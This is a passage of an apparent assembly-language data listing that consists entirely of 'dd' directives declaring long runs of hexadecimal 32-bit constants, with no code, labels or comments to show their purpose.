		dd 31548A58h, 1CFABA9Bh, 9EA823DFh, 7C2AB6C6h, 0F3DDE425h
		dd 7F178023h, 707D95A8h, 0DE9B4092h, 2CC1833h, 0E0E05F82h
		dd 67DD6E57h, 3FDFCFE6h, 0E420054Dh, 0DCFAB9C4h, 0A2AA5D94h
		dd 95D4DAA4h, 0ABBBDF4h, 0FE2B7BD1h, 39EBA090h,	0ACBFA205h
		dd 7E76F25Ch, 0C13E4D11h, 94BB762Ch, 0FE29BFAEh, 61FDB062h
		dd 0B07A515h, 9BA8746Dh, 0A42589F8h, 67AF95EBh,	419CD4B7h
		dd 43349EEEh, 1AC05743h, 0A7C62098h, 0FC5F483Fh, 0EF4FD6ABh
		dd 3BD4BE48h, 2E2E496Bh, 0F02E728h, 0C8E2AF26h,	6135FDFBh
		dd 0F43A2F0Ah, 1F6E646Dh, 5D64BF7Fh, 0DE29427Eh, 3670CC41h
		dd 0B750CA50h, 1C57BD75h, 0B3A944ADh, 5C2F52BFh, 7AE4347h
		dd 0A17955Fh, 9D7B34EAh, 6A16BB86h, 0E13BDE3Bh,	0BE07FA29h
		dd 0A98D852Ah, 0E60505Eh, 39ECD649h, 0F84441F2h, 6B8CA2Ah
		dd 40197228h, 826DB2F2h, 4A375DD9h, 9A1A6500h, 0CC2D19C6h
		dd 0CF25000Ch, 8EF286CFh, 0AECD4BDh, 0AFCA726h,	402176D6h
		dd 1DEC5ED6h, 0A267B533h, 76DC1F8Dh, 7B2D6D05h,	0F03E1577h
		dd 912487A0h, 7A1F1E2Ah, 32EC8172h, 188A9C01h, 5ED9F532h
		dd 5E4C6EADh, 0D1EA071Ah, 55EBF178h, 0CC74FBF4h, 6D7644D3h
		dd 0FBBEFD0Ch, 7AFB1AADh, 0FE8012A8h, 98D24CC7h, 0B21F234Ah
		dd 3AE7BF06h, 0B10384FBh, 1A7826Ah, 0FEFA5042h,	8614A7CFh
		dd 0B64C767h, 39A4C894h, 28A7CF93h, 15002873h, 0CD209463h
		dd 2A1B84FFh, 0AEC665BEh, 1B2F08A2h, 56023628h,	5EE21F08h
		dd 3907FBABh, 583B9B20h, 43708C2h, 41542EC0h, 800FACA5h
		dd 18C8BAB4h, 5DE88690h, 1A427E19h, 500CC80Dh, 8BAB2BBBh
		dd 13B5662Ah, 58657DB3h, 0A1851E38h, 56262790h,	7DBD57BCh
		dd 8D3E9B88h, 2EB17D75h, 1239614Ah, 424AF1B5h, 4D788F7Eh
		dd 0E60FFB09h, 95F18CFAh, 4639B5A4h, 61B38DE1h,	0CDE158C1h
		dd 605220B2h, 0A2E985DEh, 0D6A8A319h, 94301C33h, 22BB2E34h
		dd 2AA7316Ah, 3734DD6h,	0C6E3D0C2h, 38322725h, 5A952B8Eh
		dd 558B29E9h, 0F99E51FBh, 9196142h, 2508F8FBh, 0D8409EA9h
		dd 1BD451FCh, 48194A68h, 0DC411FC6h, 97C8AA97h,	6058157Dh
		dd 6027C390h, 56F749Ch,	338486B1h, 3C6F2408h, 0CC00103Dh
		dd 0D764F522h, 574B6683h, 0BAC69E40h, 78748102h, 0EE30E1FBh
		dd 0DC2ACFA4h, 2CA0C688h, 32B43123h, 52AB1BF8h,	1D396524h
		dd 8C4A8861h, 0B34E75C0h, 3B12559Bh, 8DE8D9E0h,	97480CA0h
		dd 1B58190Ch, 7984EDAAh, 13066A20h, 0D3160B5Dh,	843F9716h
		dd 0FF3A9C8Ah, 0F3670579h, 8A071A53h, 0D25050D0h, 0C4A1A6FBh
		dd 7A0EA16Ah, 5D0F306Eh, 9FB646B1h, 2CA168A3h, 34DC0D65h
		dd 98CE0D4Dh, 0DA4E4495h, 0A5CE33A8h, 0AAECD444h, 0A62A4F8Bh
		dd 0C07E05E0h, 0AD252541h, 6679A14Ah, 0ADD8331Ch, 0D609406h
		dd 15B58880h, 0A2D66FA5h, 6565F5CBh, 99461034h,	60D59A4Ah
		dd 5405AF40h, 9DC5B54Eh, 84AD1328h, 0F65C03BDh,	6CB9261h
		dd 0F4FA35CBh, 0EB261664h, 0B64D678Ch, 1933FC0Eh, 2C1A8CBCh
		dd 0B764B4C5h, 0AA830179h, 6964D849h, 0F8EC2768h, 0D0092046h
		dd 0C5DF9F08h, 71313578h, 0C0FF7207h, 572E002Ah, 0D569944Fh
		dd 224F3B28h, 5DFF3A6Dh, 9D539AB0h, 0B518E9CCh,	69934884h
		dd 730BD291h, 5AF3F28Ah, 5880B81Bh, 8480297Ah, 0C0F94832h
		dd 626CDD4Bh, 0DC60CCA4h, 6BA063h, 2C6A48D8h, 0A4752860h
		dd 0F9421866h, 0B6C42E63h, 5080AD1Ah, 80E058D2h, 0F82E45A8h
		dd 9958974Ah, 5677EC5Fh, 0E7AE1929h, 0BF13B0D7h, 4BCBA345h
		dd 0F42EB397h, 1A893331h, 11960BFEh, 0A116AC21h, 74846640h
		dd 0E5026BBDh, 0D4F59CBAh, 92CAC2FFh, 3D779A70h, 919B10A0h
		dd 66810F86h, 0D92F6B02h, 52699BC4h, 89A65CC0h,	7BAEB94Ah
		dd 0C18970B1h, 68DC70A4h, 702D0D0Ch, 0C0A8EBCAh, 0E1565897h
		dd 0B4D87DE6h, 3F986B74h, 5E0250B0h, 34A4B20Bh,	56EB17D1h
		dd 71772512h, 4535CE74h, 0B39849D6h, 6972004Fh,	743A09C4h
		dd 4C17A68Bh, 365388Bh
		dd 0AFD6CA4Dh, 0D5B30998h, 0D195F178h, 72EF72EEh, 5A8E2300h
		dd 569B345Ah, 8CA3A7EBh, 0D8A2F9F4h, 6AD1A9FAh,	0B2EBF2EBh
		dd 0E97DFDB5h, 0BF996531h, 498689A0h, 9A8CB307h, 0AE2217E3h
		dd 4C690397h, 328206B0h, 0BD00E8A0h, 61826BE6h,	80AFA307h
		dd 9A2A3660h, 4F3A591h,	75264399h, 565DD691h, 0F4257342h
		dd 0FF05130h, 151C1539h, 3400E11Ah, 50F08623h, 5B23A240h
		dd 0BB7C501Dh, 0FEB67FF1h, 0CCBA053Dh, 332835DBh, 5CBA710h
		dd 0E1185712h, 0D2D4D1A1h, 5C30EE2Eh, 2A1E440h,	4ECA905Ch
		dd 0D9FA0C7Ah, 130FEA63h, 8E50F52Eh, 0CFEE9AEAh, 5DDADC44h
		dd 2C4CED0Dh, 5D7F7C90h, 3C16140h, 0E0496069h, 0FEEC97FFh
		dd 515B802Dh, 4311AD9Ah, 0D525308Eh, 22B05B35h,	0D66FDD0Dh
		dd 21DB8317h, 0A1B2A2D3h, 0F91B0301h, 672EB3DFh, 8D85B4D8h
		dd 756590F1h, 7B4AD5EAh, 0C7277FBFh, 0FE5F9B27h, 0A3F40EA5h
		dd 9972700Ah, 42B6820Dh, 0F5A01779h, 302A6B18h,	0D94264DDh
		dd 0F0E2EA7Bh, 0B6C3F5FBh, 0B74020CCh, 0E1260AFCh, 54618187h
		dd 19500A8Fh, 353A236Dh, 0C505432Ah, 4C4DBD59h,	59701402h
		dd 9C607541h, 2EEC8238h, 0B620E58Ah, 8927D930h,	0BD6ECEA6h
		dd 0DCBA2EE9h, 0F40D11EBh, 97C8623Ah, 22F1484h,	358DFD6Bh
		dd 0BC30D99Ch, 22EE2669h, 1778BFCAh, 0BC9292ADh, 36576ADFh
		dd 6929BFDEh, 0FDC1EEF8h, 0BFD0424Ah, 4F895FBh,	80C384BEh
		dd 0A80465ECh, 8FAEC86Ah, 0DEF8503Eh, 0C0928EAFh, 79D9DA50h
		dd 0D14457EFh, 2D0C92A6h, 917B6882h, 9D2B4A1Eh,	0D826B426h
		dd 3B600658h, 4A192848h, 13EC5308h, 91C5F7EDh, 0F4D760CAh
		dd 3435F289h, 415F4690h, 2946EE14h, 7F076ABBh, 523F0A5Dh
		dd 0FA715CDh, 0F47136CEh, 5CDC1B05h, 6F839DCDh,	3A20821Fh
		dd 6902008Dh, 821702B5h, 8D355E9h, 0B55DF838h, 0F4ADC134h
		dd 2B22D5h, 2576E528h, 7EB86EA8h, 0B3D0B025h, 504A217Fh
		dd 48951239h, 0E80DEF60h, 0F01AC31Ah, 747842FBh, 5380A4DDh
		dd 0EF6EB1D1h, 0E7D795Dh, 5D574719h, 70F31229h,	9BA8D84Dh
		dd 52B22CA4h, 0C3C4CF9h, 13F0783Fh, 60990781h, 0F01E63F4h
		dd 85F5FF39h, 0A10C3DD1h, 0CE08EEB4h, 269B6909h, 0DCFD0BFEh
		dd 5FC6E889h, 0E3BAFAE9h, 1B29ACBFh, 405CFEE9h,	0F91007C9h
		dd 7FC9BBDCh, 0E9CAF140h, 931EE903h, 830FFA38h,	0F807C31Dh
		dd 0F42EA468h, 5C5641B1h, 8F510B4h, 7CFB8F3Dh, 0EFD9D4E7h
		dd 6202ACD7h, 6852C1F0h, 7A4559E4h, 0C1186BEh, 743401D4h
		dd 5BBC43E5h, 469424ADh, 188F5495h, 0A6EB48DBh,	69C85C69h
		dd 0F1FD3248h, 81875749h, 0B32A32C2h, 7D1128FCh, 0B150671Ah
		dd 0D8D51745h, 9CFB96AEh, 0D5E09687h, 647B4BAh,	46F8AC28h
		dd 0F735F36Ch, 6A911405h, 8A8F2CFFh, 1934687Eh,	0BC08C891h
		dd 0E3EC3F5Eh, 10373E2Ah, 0BBE75C13h, 0FFBCC200h, 4AEE06C1h
		dd 5DA3177Bh, 0A7999C8Ch, 326DE43Ch, 202AF24Eh,	0EBEE1D16h
		dd 5A3ADDE6h, 54365D16h, 562CCBBAh, 7DF71688h, 8AB4827h
		dd 0D4046D1Dh, 1AB2BB70h, 0CD3143F6h, 55A6AA94h, 0AAB87D80h
		dd 933A4E67h, 8C64832Eh, 15C9B2EEh, 44175797h, 54004B5Ah
		dd 78A47B9Eh, 4A5DB598h, 79775027h, 7EC6958h, 0D4D44D37h
		dd 79D73428h, 10B4C124h, 3CB53299h, 68E5C1Ah, 1F0D75DEh
		dd 67E5F029h, 88CBC959h, 0AAB028Ch, 604EB8F6h, 0D787ACB3h
		dd 0AEDA8BB3h, 1D34E326h, 87C54173h, 0FBC6323Fh, 4F1901CAh
		dd 5DD87766h, 9505E1D1h, 0ECBBCED4h, 82B57985h,	0CD578856h
		dd 0A8CA32F5h, 8BA17637h, 6784A4Fh, 1192FF29h, 0A9C1D728h
		dd 0D7B1AF8Bh, 0AFFD35A1h, 0C3C40C4h, 1391576Ch, 85033E23h
		dd 324DE8BAh, 8B56508h,	0D3DD7B9Bh, 48115AAEh, 3C0C18A8h
		dd 8D97D809h, 705D4DA2h, 4C597203h, 0A331512Fh,	6AABF11Ch
		dd 0A83C572Ah, 5C496754h, 0D351874Fh, 2872441Ch, 0E444ACCBh
		dd 7B8B3C8Ah, 258829BFh, 558236B3h, 0F564F749h,	0ED9E78BEh
		dd 0F9EBB62Eh, 960DD1C1h, 4ADAF87h, 0DACC6CE7h,	5914D2D0h
		dd 5C0CF5DCh, 5977CC81h, 5D264BADh, 63916802h, 576E8C69h
		dd 7767F6C7h, 0ADCE6D59h, 1B935AB2h, 0A2025013h, 0ADDB4074h
		dd 0F5F4BBE0h, 94EE17C7h, 0ED2997E3h, 58B3982Ah, 5CDC5534h
		dd 0C4F8C88h, 0F5AC9D69h, 0D7BAA1FAh, 8CB28545h, 42CD8848h
		dd 0C858B2EDh, 2D81E11h, 82405B10h, 1AFAC44Ch, 6295CE56h
		dd 48812DA6h, 0AFED0377h, 8764DF8Dh, 30D0C81h, 6FA0215Ch
		dd 0C83AA9BDh, 8373F83Eh, 3409BC77h, 0D0038284h, 0F750CE28h
		dd 416818BDh, 5779F5AAh, 61DEC84Bh, 0B85D57A7h,	748A325Fh
		dd 0BF85FE99h, 6A449BE1h, 84ACCB82h, 688F0230h,	0BF01885Dh
		dd 0C971A505h, 0A0994ACFh, 27D362C4h, 0DEBB2DF3h, 0EF5C4202h
		dd 0D97B07FEh, 0EF3FC5F4h, 0A9E740B4h, 0A57E8E32h, 0E7773D75h
		dd 6A440A84h, 8D7D7B39h, 0CBEEA8B5h, 0F5EB46FBh, 0C12A2036h
		dd 163BB7D8h, 22C82C89h, 0B9048803h, 57C890A3h,	93314016h
		dd 0C5642306h, 37500519h, 0F2244414h, 2EB01554h, 0CF9FE410h
		dd 0A40C755Eh, 89A6ED06h, 2EE03C8Fh, 3360529Eh,	0B584A8FEh
		dd 8280842Eh, 0EB1B8596h, 0DF4CA412h, 2947C5D3h, 27E849D4h
		dd 64432E0Ch, 3E5D0071h, 2024A1C7h, 4C8B7E6Fh, 7009CB9Fh
		dd 178A02A7h, 0F952789h, 4BEC81F4h, 0A3E3904h, 0AF5C64F0h
		dd 223099CAh, 14F7C4D1h, 0BB4C8FFDh, 2602AFB6h,	825751F7h
		dd 3ED0905Eh, 532B046Ah, 31EBF2C9h, 93B95565h, 0FC238CBAh
		dd 0E995A6E2h, 40E6434Eh, 1DE39479h, 6515C99Fh,	324CE0C9h
		dd 0A280DA3Fh, 37ED50F2h, 402AA6CCh, 0ACA8437Ah, 0E5D0573Fh
		dd 0A7DF4E96h, 7238CE0Fh, 0ABAB0EB5h, 20E31EB3h, 0E8856B1Bh
		dd 2402D728h, 4A82910Bh, 12E09404h, 0BA0E2581h,	880AE36Fh
		dd 10E2361Eh, 0FC53F516h, 8983FF66h, 0F135C706h, 0EF95F15Fh
		dd 4ACA5FA4h, 699E7489h, 0FF84AFC5h, 0E01646B1h, 78664383h
		dd 0D4E115EBh, 85F706E1h, 0ECF03A21h, 3D531003h, 5DF73E9Fh
		dd 0F8E2876Ah, 5E7EFE0h, 0BCECBF0h, 0D9886CB4h,	12BE3380h
		dd 0D4AF40F9h, 0A75854Ah, 323F2452h, 1B09C846h,	0DFE716B3h
		dd 60B36AFAh, 0F89E1D52h, 73D57BCAh, 866A7827h,	0BF07F4A9h
		dd 7546F8BFh, 45F4CD02h, 0FA451294h, 4511A9B2h,	71E42AD5h
		dd 297CD5CDh, 0A5613256h, 6AD6942Fh, 0D51B9D51h, 0FD79C451h
		dd 387E5F51h, 0E1EDE6ECh, 38D250ABh, 0AB4A480Ah, 3D4CE250h
		dd 95C22FB3h, 2BBE055Dh, 0F471ADF1h, 3EB5C00Ch,	0ABE3FFB6h
		dd 95FB17B0h, 63C313Bh,	3888A424h, 4FB90BB1h, 45747AE1h
		dd 301896Ch, 521FF2ABh,	3EC55D97h, 0B0DE45F2h, 0EEEF1D01h
		dd 8B9B6267h, 15859F24h, 0AC4B87C6h, 84681B4Bh,	7B9AEE02h
		dd 42E91075h, 537F2ECCh, 540D04C0h, 523EE51Ch, 87B9142Bh
		dd 493E14AFh, 99005F9Ch, 3B23A414h, 719563A5h, 0E29C1838h
		dd 8B5D48B3h, 22B217h, 18C072ACh, 0AF368412h, 0A57B9280h
		dd 0EE934A69h, 94251971h, 74105011h, 65F21B49h,	9C83933Dh
		dd 0B94FD5C0h, 34A0A3E9h, 48A8C7AEh, 75793401h,	1D706C16h
		dd 0F95D8F43h, 5BA2A181h, 34647662h, 5CF93070h,	0DFE99B9h
		dd 99AA53BEh, 7BE57D74h, 47CC2EC9h, 9A1F390Ch, 25D02E80h
		dd 0D2C28455h, 45741640h, 0AE5EB98Ch, 44496E27h, 321804B0h
		dd 262032BAh, 5001D474h, 5649A837h, 3123C832h, 9CA2DF08h
		dd 0B16E983h, 0A35174DCh
		dd 21151790h, 0F43E1763h, 1D56EA2Dh, 2D78FD29h,	143E3184h
		dd 8BE05F52h, 0E182F4E0h, 0B89569ACh, 0B7D480C2h, 0BE7FA08Bh
		dd 836F2903h, 0AE9029BFh, 0B7DEBD8Ch, 107B2859h, 0E282C391h
		dd 48D6847Ah, 220BE305h, 0E0048816h, 0F451BA22h, 58985F36h
		dd 0F7156EEh, 2FBD32BBh, 0D71FABABh, 0ECBE2065h, 0D67F82BDh
		dd 0BE350A9Dh, 1D2261F8h, 0C0BFD15Eh, 3D348713h, 76CBD116h
		dd 957A3136h, 0BBE2BF7Fh, 84A15AF0h, 0FEA0DE50h, 72496A5h
		dd 7EABB3E9h, 0D93D8C3Fh, 0FEAFAFF1h, 0F17F7B85h, 5902281h
		dd 0B60EABDCh, 9F2B8ABAh, 0A0AD2512h, 0D211D8C3h, 2564B2CFh
		dd 42654CAAh, 0AAF89629h, 40A8C980h, 29224A18h,	14DF3010h
		dd 294A04F1h, 7FD5E95Bh, 2348400Eh, 99B15EC6h, 505E0741h
		dd 0B5154948h, 0C67E971h, 0A57C7C5Ah, 0E26025B1h, 0BDB04A23h
		dd 35B58CB4h, 0F5F3387h, 319AD29Ah, 32E9ED84h, 9500B423h
		dd 2EE9DBBFh, 73BD48C4h, 69FB8995h, 77062F9Ah, 666A5815h
		dd 37952076h, 0AE9C5501h, 4631D991h, 9B313578h,	0C81A77AEh
		dd 0E548DC3Ah, 501A6096h, 3255BD85h, 0B2473AF6h, 5842797h
		dd 1EB8C131h, 0AAAFDF62h, 3C0C1963h, 0F5404F40h, 94805A24h
		dd 29122A18h, 3BE501h, 4420A23h, 0E5D3099h, 6A2F0E90h
		dd 0EB8B63BCh, 4774FA03h, 3E44A85Fh, 0D6120692h, 2140EC9Dh
		dd 5D4C0A30h, 1EC6570h,	59F83C45h, 147CDAC0h, 350E8D67h
		dd 0FA290D12h, 3788094h, 50BB88B8h, 0BB27A2h, 0BBCEF365h
		dd 0F7570174h, 0AF78F830h, 6BCA36C8h, 48156398h, 290ECD3h
		dd 420DA1Ch, 664842D3h,	6626A0F1h, 42EFBEF8h, 1CC7FFAh
		dd 252CDC24h, 1E2D49h, 8A6E0348h, 0AAC1524Ah, 8CEDEE8Ah
		dd 5F0A11A9h, 0A9B0C648h, 5611E9C7h, 63964595h,	0A81BE088h
		dd 49B36416h, 67BEC69h,	0EB7458D4h, 0A89BAA43h,	0B381B5A0h
		dd 0F7EE35A2h, 5D6BBE9Bh, 418EDA7Eh, 0A3BA2CFAh, 8091FB32h
		dd 32B22451h, 536370EFh, 50533587h, 0B3533201h,	8C872860h
		dd 0D88260AAh, 9B786B5h, 92AA8283h, 9EFFA1F8h, 40B8B190h
		dd 0AB2A8055h, 6C5FA02Bh, 624FB545h, 97581947h,	631B59D8h
		dd 2D5BE54Ch, 41B0DCE3h, 501381FDh, 1BC68D41h, 0C32CA2AEh
		dd 2B395DB2h, 0B7B065BDh, 3AA050C6h, 3C0267AFh,	539B5210h
		dd 0FFDB5033h, 2F2DEFC2h, 320351CAh, 4226D503h,	0F60324C5h
		dd 981954DFh, 0A2BEC37Fh, 0C3E16113h, 73291C45h, 15FE07F0h
		dd 9C57780Fh, 884515CAh, 0A4087FB8h, 2A85D642h,	0D0892EFAh
		dd 8966338Fh, 94B502AFh, 438E5533h, 0C4EC7D41h,	81C446E8h
		dd 757FFAFAh, 5F505E62h, 0A1881338h, 879E36F2h,	8CA5AC98h
		dd 5115F50h, 3A08D3ACh,	0FEDCC2CAh, 0ADE5A496h,	0C2C4B95Fh
		dd 6DD102E9h, 0CEBDAEECh, 41A654F2h, 993C6D09h,	56862EF6h
		dd 0C0230E36h, 59779243h, 0F664B031h, 9E4B1599h, 50F442Ah
		dd 83BAA4A0h, 0A058B32Ah, 16523711h, 5D2ACFF7h,	0C354A4DDh
		dd 7B372A3Ah, 8DC45D0Eh, 0B64508B7h, 0B55961E2h, 0DCD52ACAh
		dd 3E4E15D2h, 597B5759h, 0F957FAD7h, 3AB8F29Dh,	0DC07B16Fh
		dd 0AE4ECB66h, 377D157Ah, 0DEAAFBCCh, 0B2482DEBh, 0A9D4E0D9h
		dd 0B6E0E5D6h, 1D9D5Ch,	0F45E5B29h, 6757B1E9h, 97ACE541h
		dd 0D0A2DFB8h, 480CC6B6h, 5F6A9B7Eh, 3B047C68h,	0C4BA241Ah
		dd 0D6E4C4B2h, 0BEB65657h, 55B78BB7h, 0F86633B2h, 0CA0537h
		dd 0AE070551h, 3A0C554Ah, 451510C7h, 1071BAE6h,	21EBDEA0h
		dd 30B0096Bh, 22968D29h, 2B4DBCD2h, 0E0F80800h,	6065FE96h
		dd 52E32105h, 64DDBFF4h, 10711F0h, 0C81EB8Eh, 31D8471Bh
		dd 1A117DA8h, 2A7F85D2h, 0C7D7B893h, 4F90ADBFh,	0D9140301h
		dd 1A1020C2h, 955CDD1Ah, 90E9242Eh, 0DA1304EDh,	0B3C5C9F5h
		dd 0BD166334h, 2190D913h, 0D1C848EDh, 4364AAC2h, 25136415h
		dd 9DF31EA7h, 0C2CF9566h, 78DBAEB2h, 0B43ADDB2h, 0CC7189A4h
		dd 9EB918A9h, 7C88AE6Bh, 1AE322EAh, 0EF5C1520h,	2BDB0D5Ch
		dd 7E9F3D5Dh, 8ACF2ABCh, 0D65B71B2h, 0BD008C86h, 0A3312B3Ah
		dd 8ABB7954h, 2597233Dh, 0E6BEABD0h, 4CED9404h,	0DDB8DCD2h
		dd 8A903F7Bh, 0B7E149D2h, 0D775E6E7h, 0FE063A21h, 0BE577A60h
		dd 0D9D6BB1h, 9F41BEE3h, 5374CEB3h, 0AECAA711h,	0A417D38Dh
		dd 74960213h, 2220E7B9h, 36403329h, 207698AAh, 1C0F509Ch
		dd 1446BC11h, 6E435D1Bh, 450175C3h, 0E24F3A56h,	0C40A962Bh
		dd 183A0D6h, 7BA107Dh, 0E9F1D461h, 71514783h, 9D74E745h
		dd 368E6175h, 1F9EE9Fh,	0CE18073Fh, 70E0DA09h, 20291436h
		dd 4242DD64h, 5176CBBAh, 0CA0D8543h, 90B16484h,	8E031FECh
		dd 0A3BDB06Ch, 0B5F137C1h, 0E970EBF3h, 0EAF4A20Fh, 0F31D5A1Eh
		dd 1777D8E1h, 20F86E9Bh, 0AEFC62FDh, 0EAAED008h, 7768FBCAh
		dd 0C9FED344h, 8FE382A4h, 1488A054h, 4A2ABB44h,	242A14A8h
		dd 170D4021h, 0DDA11CB1h, 48264421h, 0B50BFF0Ch, 0D128C42Ah
		dd 0B77357FAh, 80C8F8BBh, 1360C5B6h, 3BB72EFCh,	6EB02894h
		dd 745A7077h, 9600CA82h, 7651F924h, 0B71BE41Ah,	8B860BB4h
		dd 2C90342Bh, 0B75C6CF1h, 735C0B3Bh, 0DBB0BE1Bh, 0AEED45DDh
		dd 4A49443h, 0B765D946h, 0EDFFEFD7h, 0ECB3BA2Ah, 262C6776h
		dd 3798470Bh, 11D310F0h, 61852321h, 27253654h, 90562A45h
		dd 29C3D419h, 83E26DB3h, 0C2D89BBDh, 0C6CACCF5h, 29431362h
		dd 6B359708h, 0D42B6EC9h, 5A8255A8h, 7D3A1597h,	5DB22EA8h
		dd 0BE561C37h, 6D734D57h, 1D49F25h, 0A4F1A93Fh,	83347E0Dh
		dd 26CB321Fh, 65DEE82Ah, 47F0BC40h, 290DFF91h, 1748827Ah
		dd 913A7D30h, 0E9EB4173h, 9F529DABh, 3EDF3202h,	0E150D034h
		dd 0D591F8AEh, 4ADB5B41h, 59F9A32Bh, 0E53DF071h, 4EB5742Eh
		dd 5E1A1FF0h, 170FF2B6h, 3B82C806h, 5418B20h, 0F195EAA2h
		dd 1BA3081h, 7EA94F01h,	43F54D55h, 2B501306h, 292CD63Bh
		dd 23F68244h, 638810Ah,	7E4E0E19h, 1900A20Eh, 0E1EAAA46h
		dd 0EA93D5B7h, 1B249177h, 0E8D3B3F1h, 68194D1Bh, 0A3BC9515h
		dd 7259C64Bh, 0DD34D145h, 5FF8F425h, 1D305F11h,	148E3B7Ch
		dd 7BEE2A2Eh, 77973B96h, 0B128EECEh, 449B8678h,	8870AF37h
		dd 4EEC2BECh, 0BAAB1063h, 21EA6354h, 0C8E22D4Fh, 24E43421h
		dd 91D1D14Ah, 6ACB122Eh, 0E9C4777Dh, 9E2C39CAh,	506831DFh
		dd 2BECB817h, 0ED321911h, 5E3497E5h, 1CB53C37h,	4425FACBh
		dd 79C460Ch, 8332CEAAh,	0DD7C26EEh, 0C2C116EFh,	14DD5772h
		dd 19D684Ch, 0DA0483ACh, 41518C19h, 37A23F1Bh, 29ADCB4Dh
		dd 624F9CAEh, 404BFBECh, 0E0EA0327h, 6A1782BBh,	0F6A3F828h
		dd 0AE1CE3EDh, 0D582355Ah, 3519BF3Eh, 0DA0D72D0h, 71A05450h
		dd 543B029Ch, 7468EBD0h, 87F48FA1h, 423448AAh, 4AD96411h
		dd 432AC991h, 0C1568DAFh, 0CF336CF4h, 7C69BA46h, 4EB2730h
		dd 902347AFh, 0C7F8211h, 27553F96h, 2CCC3718h, 3999A366h
		dd 2B3FAD93h, 2F9FB54Ah, 0C15B7FCEh, 0B8F6C1F0h, 5D6FDE2Fh
		dd 72D199ECh, 0BE4D3476h, 0D1F74D1Bh, 38D8D65Dh, 0DF275D2Ch
		dd 0E45166F5h, 5DDF4F3Bh, 2E9B4B9Ch, 7D7D27DBh,	9E0A6035h
		dd 1406DE0Fh, 7E1E8CFh,	0DB15673Fh, 48434392h, 0BAA938D4h
		dd 71C7230Ah, 0A6848466h, 55CE554Ah, 0B4E5A2D0h, 3897EAD0h
		dd 0FDA2E3E1h, 9FE02AC2h, 0AFCE6AB0h, 8F28E4EFh, 9E5F4954h
		dd 7AFABA19h, 7458829Ah, 0F5580B01h, 91B833D0h,	75084043h
		dd 1080C8A5h, 0AD793AEEh
		dd 21A64C98h, 16AB677Ch, 0C8B9D132h, 289E51BBh,	0ACF9628Bh
		dd 0FE7E95AAh, 6097FC15h, 795723BBh, 0F8BE194Eh, 5F0D5A0Ah
		dd 75954C1Eh, 7DB136E1h, 8166913h, 0C81A75AAh, 0D300EA05h
		dd 9086EB29h, 4A468834h, 557C5A90h, 0BAA00FC0h,	4ECAA4F8h
		dd 51903B22h, 0A4B06B4h, 46440A5Ah, 0CB1EE591h,	0C8961EFAh
		dd 0BCF83722h, 0E4498C03h, 83F3463Dh, 0A2893692h, 0B1FF1F57h
		dd 7ACBE057h, 484222F6h, 47523DD7h, 8EF37A18h, 0A4F910C7h
		dd 3E6F24BBh, 39252298h, 4A3BFDDDh, 0A77C5D70h,	0ED7DA72Bh
		dd 0FB665ACEh, 162FACA2h, 9CBA9F68h, 666286EEh,	80BA82C4h
		dd 1CB40EADh, 0EE3B4854h, 7C55CCB2h, 0B38A55B1h, 0DDBADD2Eh
		dd 0DBDC7A77h, 3C617C57h, 9F31405Ah, 9F103817h,	6FC79811h
		dd 84F3664Eh, 28C095D4h, 1320ACB4h, 140C704Ch, 0FC3985B9h
		dd 0A9749EFh, 0E9E09D28h, 8BEB484Bh, 0D0820E0h,	0A411D962h
		dd 0A4BF2FFCh, 90225D4Bh, 4F5E8D21h, 0F579FD36h, 0BCCE6956h
		dd 0A7117489h, 82AD0B43h, 32ADE732h, 5CF1DE6Bh,	0A71DEC9Dh
		dd 247DCA80h, 0A3A6D450h, 0E1C78462h, 503D8704h, 0EAA39FFBh
		dd 7ECD7CA6h, 0E92D561h, 0FA26B97Dh, 0DF629886h, 0A6C40FF2h
		dd 99F4B39h, 15AA2F92h,	0A4DF4873h, 56B5470Ah, 6B6AEAA3h
		dd 0F9314255h, 0D57A2FA2h, 0F729693Eh, 0BCB37619h, 0D50304E2h
		dd 43F0F819h, 5B0C6021h, 4E8C9655h, 0C1838A87h,	0D161E895h
		dd 0E3BC8C8Dh, 0A4BD9B03h, 6DB5E486h, 0DCE24121h, 74284058h
		dd 0D3DA81A2h, 0CDF13EBDh, 0FCE00548h, 1E641892h, 0C87959F7h
		dd 612A4217h, 0BF852D5Dh, 1530206Fh, 0B4F85692h, 0C81B1855h
		dd 99EAB5Ch, 569F028Fh,	0FCD99D6Dh, 92FBF481h, 588335DEh
		dd 0D177263h, 95D175DCh, 27D1E0EAh, 0D68DFD25h,	7EFA7806h
		dd 455A47F5h, 91535E47h, 0CBE23AC8h, 203010D1h,	0C079EBC7h
		dd 901A2159h, 574FABBEh, 0E092E9E7h, 29680A71h,	7CE4C60h
		dd 82ADCF9Eh, 0F62B8759h, 60AC7846h, 6ABE480h, 0B38A7BE0h
		dd 57EAAA56h, 0D565D8E6h, 0B4577ED7h, 30D4492Ch, 0CE8F18C6h
		dd 37481A4Ah, 88C1F01Ch, 63E8A5A2h, 5948501h, 5C69684h
		dd 9CCD1C9Fh, 0CB50296Dh, 8632428Eh, 0AE1D75EDh, 0A94F9292h
		dd 1888A8Dh, 408B81E0h,	8B40B5Dh, 453F5D78h, 64481BEDh
		dd 0E9178D99h, 3324AAF6h, 412E54F7h, 0A80FEFAh,	2480509Ch
		dd 740411A3h, 263A8FAEh, 0A0ECF044h, 0DDCF166Ch, 0E918CA18h
		dd 1832C712h, 0C41FD0FCh, 2AF443DBh, 0BC4A60E3h, 52CFCA77h
		dd 0F18E0183h, 0E401395Ah, 0B928CBF9h, 0F32FD575h, 1FE6AAB6h
		dd 860091ECh, 0EB14057Eh, 0F9F9A40Eh, 301FD0AFh, 581A2BDCh
		dd 379C4C3h, 0E42A3EB3h, 6346FF10h, 6E3C32D2h, 330AF5Bh
		dd 40A1708h, 71216885h,	0C4BF7109h, 4ADE898h, 0F28108D9h
		dd 4B09C968h, 0CE016F98h, 0E8121844h, 80AB5047h, 0F526F743h
		dd 30E4895h, 0CE71404Ah, 0C4B4500Ah, 1427EFB9h,	24E66471h
		dd 0F13DFC1Ch, 12E755DBh, 0E59A9BABh, 0E0BD526Eh, 5C8D1F28h
		dd 63A98CCFh, 0A428D487h, 79D0C4Bh, 0AB92C474h,	0E0E14E84h
		dd 0D1511CF1h, 0A8EB6AB9h, 84A9D48Dh, 0CF6540h,	8379B50Ah
		dd 2F91A21Fh, 7254CAC6h, 2B52356Ch, 0D23F33A7h,	1010BE8Dh
		dd 3D575132h, 3D77FD10h, 37E07D05h, 404D3AADh, 3F8AA9C1h
		dd 3B00381Ah, 7487DFDCh, 8ED2F609h, 0FCB03296h,	23631569h
		dd 0DC816E55h, 16775DE5h, 3564A771h, 7B242535h,	80726157h
